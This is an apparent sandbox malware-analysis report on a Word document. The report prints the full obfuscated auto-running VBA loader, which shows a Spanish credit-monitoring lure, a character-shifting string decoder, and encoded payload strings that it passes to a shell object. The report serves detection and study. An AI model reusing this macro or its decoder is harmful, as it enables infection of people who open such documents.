Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 937dcf7fdf7e6804…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 48.0 KB
Created: 2016-08-31 00:29:00
Authoring application: Microsoft Office Word
First seen: 2016-10-26
MD5: ebe6a0b46c0d2af19f474ea68b258416
SHA-1: 3df5e5b33dcbda76a2e0f1b2d0cd34d726c14dbc
SHA-256: 937dcf7fdf7e68045eec008449246ad7f9231bcf01f7352d1a9a98d1d427974f
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate or Obfuscate Malicious Code

This Office document contains a malicious VBA macro that runs when the document is opened. The macro replaces the document body with a deceptive message about credit monitoring and then saves the document. The VBA code is obfuscated, indicating an attempt to hide its functionality: string arguments are rebuilt at run time by a custom decoder and passed to CreateObject and CallByName, a pattern commonly used to execute arbitrary code or download payloads. The primary technique observed is obfuscated VBA that manipulates the document content and potentially prepares for further malicious actions.

Heuristics (7)

  • VBA macros detected (medium; 5 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched lines in script:
    Public Function NGMysvA()
    Set NGMysvA = MshWDWQnMOz(CreateObject(CrPWPDkRUKeCkK("-RgdkkVRbqhos")))
    End Function
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    Matched lines in script:
    Public Function NGMysvA()
    Set NGMysvA = MshWDWQnMOz(CreateObject(CrPWPDkRUKeCkK("-RgdkkVRbqhos")))
    End Function
  • CallByName call (high) [OLE_VBA_CALLBYNAME]
    Matched lines in script:
    WSZoqWGyXM = Mid(TVyRjyb, 2, 2) & Mid(CrPWPDkRUKeCkK("m8k/c7hm2d8"), 3, 1)
    CallByName NGMysvA, WSZoqWGyXM, 1, ekmMdgpmt, 0
    Set MshWDWQnMOz = NGMysvA
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low) [OLE_VBA_DOCOPEN]
    Matched lines in script:
    Attribute VB_Customizable = True
    Public Sub Document_Open()
    Módulo1.AAqS
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  3557 bytes
SHA-256: 4d88ec99797cd12ab3d24db9c34f44a2f75923e933485467ada48969cec71d39

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Módulo1.AAqS
End Sub


Attribute VB_Name = "Módulo1"
Public Sub AAqS()
ActiveDocument.Content.Select
Selection.Delete
Selection.TypeText ("Alertas Buró monitorea tu situación crediticia, te informa y actualiza vía correo electrónico sobre los cambios más importantes que presente tu información, tales como consultas a tu historial, créditos nuevos y eliminados, modificación o alta de domicilio y actualización por regularización o atraso de pago." & vbCrLf)
Dim GnEmtI
GnEmtI = 46
If GnEmtI < 90 Then
End If
Selection.TypeText ("Activa lertas Buró  que te ofrece seguridad y protección financiera con los beneficios que te ayudaran a cuidar tu historial de credito." & vbCrLf)

Dim mnaX
mnaX = "sCYo"
Dim lpdzPOVR
lpdzPOVR = 32
ActiveDocument.Save
NGMysvA

End Sub
Private Function vAIM()
EkvJ = CrPWPDkRUKeCkK("@n@Bb@`@A/@GP@b@Ay@Cn@Kv@u@FP@bfA4@GX@YPAx@GL@Y@Au@FL@cPAs@FT@afA/@Fb@bfAo@GP@bvAk@GP@c@Ao@F3@YvAy@B3@XvAu@F/@KvAp@FD@cfAgJ@AN@FT@cv@s@D7@XfAp@FT@XvA/@B@@TvA4@GL@c@Ak@F/@KfAN@FT@c@@t@Eb@YPAh@DL@a@Ao@FT@afA/@Bj@KfAD@F7@cvAt@Fv@avAg@FP@QfAo@Fv@YP")
Dim JdACNcxjZ
JdACNcxjZ = "sTpAOAqANkUE"
Dim oFqt
oFqt = 8
Pkijw = CrPWPDkRUKeCkK("j@NvAS@GP@XPAx@GP@KPAP@GH@avAi@FT@bvAy@B@@J@@h@BP@YPAt@GX@NfAT@DT@SPAP@Ev@PPAj@C@@cfAk@GP@aPAv@Cb@Lv@v@Cj@KfAk@Gf@YP@h@Bj@@GT@b@Aj@FD@c@@y@GL@Lf@v@CD@Mf@t@FT@d@Ak@Bb@K@@h@BP@YPAt@GX@NfAT@DT@SPAP@Ev@PPAj@C@@cfAk@GP@aPAv@Cb@Lv@v@Cj@KfAk@Gf@YP@h@B")
vAIM = EkvJ & Pkijw
Dim hFIxNhSjqxQu
hFIxNhSjqxQu = "AwZjAOtIopBAzx"
Dim itVbjxDjsNLiG
itVbjxDjsNLiG = 12
End Function
Private Function ekmMdgpmt()
Pkijw = CrPWPDkRUKeCkK("dkk ,dwonvdqrg")
TRZw = CrPWPDkRUKeCkK("khbx axodbtshnmon")
Dim mXGWRLWi
mXGWRLWi = 2
If mXGWRLWi < 12 Then
Dim ENWhganlsN
ENWhganlsN = "smvzM"
Dim HGpl
HGpl = 44
End If
aXibXZnA = CrPWPDkRUKeCkK("dmb `rr ,")
Dim urFafB
urFafB = 63
If urFafB < 60 Then
urFafB = urFafB + 94
End If
ekmMdgpmt = Pkijw & TRZw & aXibXZnA & vAIM
Dim EZxZ
EZxZ = 67
If EZxZ < 43 Then
End If
End Function
Public Function NGMysvA()
Set NGMysvA = MshWDWQnMOz(CreateObject(CrPWPDkRUKeCkK("-RgdkkVRbqhos")))
End Function
Public Function MshWDWQnMOz(ByVal NGMysvA As Object)
TVyRjyb = CrPWPDkRUKeCkK("8th7qt")
WSZoqWGyXM = Mid(TVyRjyb, 2, 2) & Mid(CrPWPDkRUKeCkK("m8k/c7hm2d8"), 3, 1)
CallByName NGMysvA, WSZoqWGyXM, 1, ekmMdgpmt, 0
Set MshWDWQnMOz = NGMysvA
End Function
Private Function CrPWPDkRUKeCkK(clPMYtx)
Dim itcK, AFQJXo, bOcuSzJLIKL
bOcuSzJLIKL = Len(clPMYtx)
Dim LdUMYXGxJxBAX
LdUMYXGxJxBAX = 56
If LdUMYXGxJxBAX < 12 Then
LdUMYXGxJxBAX = LdUMYXGxJxBAX + 12
End If
For itcK = 1 To bOcuSzJLIKL
Dim xygSOQM
xygSOQM = "cqejLxd"
Dim ORGSmE
ORGSmE = 71
AFQJXo = AFQJXo & Chr(Asc(Mid(clPMYtx, itcK, 1)) + 1)
Next
clPMYtx = AFQJXo
AFQJXo = ""
Dim wmEaV
wmEaV = 4
If wmEaV < 72 Then
End If
Dim qtUUqCXI
qtUUqCXI = Int(bOcuSzJLIKL / 2)
AFQJXo = AFQJXo & Right(clPMYtx, bOcuSzJLIKL - qtUUqCXI) & EUiadvgmdcxz(clPMYtx, qtUUqCXI)
Dim vDWvtWZPxKlivd
vDWvtWZPxKlivd = "zGwMgxw"
Dim fwjzS
fwjzS = 2
CrPWPDkRUKeCkK = AFQJXo
Dim mCZr
mCZr = "feDyalkDMUxxO"
Dim scoQohXP
scoQohXP = 49
End Function
Private Function EUiadvgmdcxz(eSWbj, JrhGFcUlL)
EUiadvgmdcxz = Left(eSWbj, JrhGFcUlL)
End Function